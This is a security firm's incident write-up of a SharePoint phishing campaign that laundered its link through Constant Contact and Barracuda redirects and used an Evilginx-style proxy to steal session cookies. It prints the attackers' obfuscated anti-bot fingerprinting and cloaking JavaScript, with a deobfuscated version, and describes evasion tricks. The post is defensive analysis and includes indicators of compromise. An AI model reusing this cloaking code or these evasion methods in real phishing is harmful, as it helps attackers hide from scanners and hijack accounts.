We recently intercepted a SharePoint phishing attack targeting a local organization. The attack stood out because of how it abused legitimate services at every step. Microsoft SharePoint delivered the lure. Constant Contact handled the redirect. Even Barracuda’s link protection service got involved. By the time the victim reached the actual phishing page, the URL had passed through three different “trusted” services.
The goal wasn’t just to steal a password. The attackers built an adversary-in-the-middle proxy to capture authenticated sessions. MFA doesn’t help when the attacker steals the session cookie after you’ve already authenticated.
What the Victim Sees
It starts with a SharePoint notification. Nothing unusual. The kind of thing employees see multiple times a day:
[Name] shared a file with you
"Invoice_Document.docx"
[Open] [Download]
The email is legitimate. SPF passes. DKIM is valid. The sender domain is actually sharepoint.com. The attacker created the document directly in Microsoft 365 using a compromised or throwaway account, then shared it through SharePoint’s native sharing feature.
The document itself contains a fake “encrypted document” image with a big blue “VIEW DOCUMENT” button. Clicking it starts the redirect chain.
The Redirect Chain
We traced the URL through three hops before it reached the phishing infrastructure:
SharePoint Document
↓
Constant Contact (rs6.net) // Email marketing platform
↓
Barracuda LinkProtect // URL security scanner
↓
Attacker's Server // AiTM proxy
Each hop adds legitimacy. URL reputation services see domains belonging to Constant Contact and Barracuda and let the traffic through. The attackers are essentially laundering their malicious URL through services that security tools trust.
The Disappearing Phishing Page
When we tried to access the final URL with curl, we got redirected to wix.com. Nothing malicious. We tried wget. Same thing. The phishing page seemed to be gone. It wasn’t. The server was checking who was visiting.
Requesting the page with full browser headers returned something different: a page with nothing but a script tag containing 2KB of obfuscated JavaScript.
The Obfuscated Fingerprinting Code
Here’s what the server actually returned:
<script>
(function(q,u,r,g,t,v,w,x){var n={},l={mode:"php",errors:n};
try{function c(b,a){try{l[b]=a()}catch(f){n[b]=f.name}}
function d(b,a){c(b,function(){function f(m){try{var h=a[m];
switch(typeof h){case "object":null!==h&&(h=h.toString());
break;case "function":h=u.prototype.toString.call(h)}e[m]=h}
catch(y){n[b+"."+m]=y.name}}var e={},k;for(k in a)f(k);
try{var p=q.getOwnPropertyNames(a);for(k=0;k<p.length;++k)
f(p[k]);e["!!"]=p}catch(m){}return e})}d("console",r);
d("document",g);d("location",t);d("navigator",v);d("window",x);
d("screen",w);c("timezoneOffset",function(){return(new Date).
getTimezoneOffset()});c("webgl",function(){var b=g.createElement(
"canvas").getContext("webgl"),a=b.getExtension("WEBGL_debug_renderer_info");
return{vendor:b.getParameter(a.UNMASKED_VENDOR_WEBGL),
renderer:b.getParameter(a.UNMASKED_RENDERER_WEBGL)}});/* ... */}
catch(c){}(function(){var c=g.createElement("form"),
d=g.createElement("input");c.method="POST";c.action=t.href;
d.type="hidden";d.name="data";d.value=JSON.stringify(l);
c.appendChild(d);g.body.appendChild(c);c.submit()})()
})(Object,Function,console,document,location,navigator,screen,window);
</script>
Breaking Down the Obfuscation
The function parameters at the end tell us what we’re dealing with:
})(Object, Function, console, document, location, navigator, screen, window);
// q u r g t v w x
The obfuscated variable names map directly to browser globals. Once you make that substitution, the code becomes readable:
// The collection object
var fingerprint = {
mode: "php",
errors: {}
};
// Function 'd' enumerates all properties of an object
// It captures both enumerable and non-enumerable properties
function collectObject(name, obj) {
var result = {};
// Get enumerable properties
for (var key in obj) {
var value = obj[key];
if (typeof value === "object" && value !== null) {
value = value.toString();
} else if (typeof value === "function") {
value = Function.prototype.toString.call(value);
}
result[key] = value;
}
// Also get non-enumerable properties via getOwnPropertyNames
var props = Object.getOwnPropertyNames(obj);
result["!!"] = props; // Store the full property list
return result;
}
// Collect everything
fingerprint.console = collectObject(console);
fingerprint.document = collectObject(document);
fingerprint.location = collectObject(location);
fingerprint.navigator = collectObject(navigator);
fingerprint.screen = collectObject(screen);
fingerprint.window = collectObject(window);
// Timezone offset
fingerprint.timezoneOffset = new Date().getTimezoneOffset();
// WebGL renderer - this is the key bot detection
var canvas = document.createElement("canvas");
var gl = canvas.getContext("webgl");
var debugInfo = gl.getExtension("WEBGL_debug_renderer_info");
fingerprint.webgl = {
vendor: gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL),
renderer: gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL)
};
The Auto-Submit Trick
The last part of the script creates a hidden form and immediately submits it:
var form = document.createElement("form");
var input = document.createElement("input");
form.method = "POST";
form.action = location.href; // POST back to the same URL
input.type = "hidden";
input.name = "data";
input.value = JSON.stringify(fingerprint);
form.appendChild(input);
document.body.appendChild(form);
form.submit(); // Sends fingerprint to server automatically
The page loads, JavaScript executes, browser fingerprint gets collected, and the data is immediately POSTed back to the server. The server then decides whether to show the phishing page or redirect to a benign site.
What the Server Checks
The WebGL renderer check is the primary bot detection. Real browsers report actual GPU information:
| Visitor Type | WebGL Renderer | Server Response |
| Real Chrome on Windows | “ANGLE (NVIDIA GeForce GTX 1080…)” | Phishing page |
| Headless Chrome | “SwiftShader” or “Google SwiftShader” | Redirect to wix.com |
| Linux VM / CI runner | “llvmpipe” or “Mesa” | Redirect to wix.com |
| curl / wget / scanner | No JavaScript execution | Redirect to wix.com |
The navigator object check catches navigator.webdriver, which is set to true in automated browsers. The console object enumeration can detect if DevTools has modified console methods. Between all these signals, the server can reliably distinguish security tools from real victims.
Session Hijacking: Why MFA Doesn’t Help
The “sso” subdomain was the giveaway. This wasn’t a static phishing page that captures credentials and redirects you somewhere. It was a reverse proxy sitting between victims and Microsoft’s real login page.
┌────────────┐ ┌─────────────────────┐ ┌────────────────┐
│ │ │ │ │ │
│ Victim │ ──────► │ Attacker's Proxy │ ──────► │ Microsoft │
│ │ ◄────── │ │ ◄────── │ (Real SSO) │
│ │ │ │ │ │
└────────────┘ └─────────────────────┘ └────────────────┘
│
▼
Captures:
• Username/password
• MFA completion
• Session cookies
The victim sees the actual Microsoft login page. They enter their password. Microsoft sends an MFA push to their phone. They approve it. Microsoft issues an authenticated session cookie. The proxy intercepts that cookie and stores it.
The attacker now has a valid session. They can import that cookie into their own browser and access the victim’s account without ever needing the password or MFA again. The session is already authenticated.
This technique uses a framework called Evilginx or similar tools. They’re publicly available and well-documented.
Infrastructure Notes
The SSL certificate on the phishing domain was issued 7 days before we intercepted the attack. Attackers routinely spin up fresh domains and certificates to stay ahead of blocklists. Let’s Encrypt makes this trivially easy.
Document metadata indicated the lure was created directly in SharePoint using “Microsoft Word for the web” rather than a desktop application. This is likely intentional. Desktop Office applications embed machine-specific metadata (author names, file paths, printer info, revision history) that could trigger detection rules or expose the attacker during forensic analysis. Creating the document entirely in the browser avoids most of that.
Takeaways
A few things stood out about this attack:
- Legitimate services at every hop. SharePoint, Constant Contact, Barracuda. Every URL in the chain belonged to a trusted provider.
- The phishing page hides from analysis. Security scanners, headless browsers, and researchers get redirected to a benign site.
- MFA alone doesn’t stop this. The attacker captures the session after MFA is completed. The only defense is phishing-resistant authentication like FIDO2 security keys or passkeys.
- The document came from a real Microsoft domain. “Check the sender” doesn’t help when the email legitimately comes from sharepoint.com.
Traditional security advice assumes phishing emails come from suspicious domains with obvious red flags. This attack had none of those. The delivery mechanism was Microsoft’s own infrastructure.
Indicators of Compromise
We’ve anonymized specific identifiers from this campaign since it targeted a local organization. The techniques and infrastructure patterns are what matter for detection.
URL Patterns
- Constant Contact redirects (
*.rs6.net/tn.jsp) pointing to non-Constant Contact destinations - Barracuda LinkProtect URLs (
linkprotect.cudasvc.com) wrapping unknown domains - Domains with “sso” subdomains not belonging to your organization
Document Indicators
- Office documents created in “Microsoft Word for the web” with empty Company metadata
- Documents with external hyperlinks to tracking/redirect services
- Lure text patterns: “secured”, “encrypted”, “protected document”
Infrastructure
- Recently issued Let’s Encrypt certificates (< 30 days)
- PHP backends on nginx serving minimal HTML with JavaScript fingerprinting
- Servers that return different content based on User-Agent or browser fingerprint
Protect Your Business
The only reliable defense against AiTM attacks is phishing-resistant MFA: FIDO2 security keys, Windows Hello for Business, or passkeys. These methods are cryptographically bound to the legitimate domain and won’t authenticate through a proxy. Pair that with conditional access policies that require compliant devices and block legacy authentication, and you’ve closed the door on this entire attack class.
Illini Tech Services can help you get there. Our cybersecurity services include Microsoft 365 conditional access configuration, Defender for Office 365 deployment, and penetration testing to find gaps before attackers do. Our Secure Complete plan adds 24/7 SOC monitoring, advanced phishing protection, security awareness training, and dark web credential monitoring.
Contact Illini Tech Services
217-854-6260
[email protected]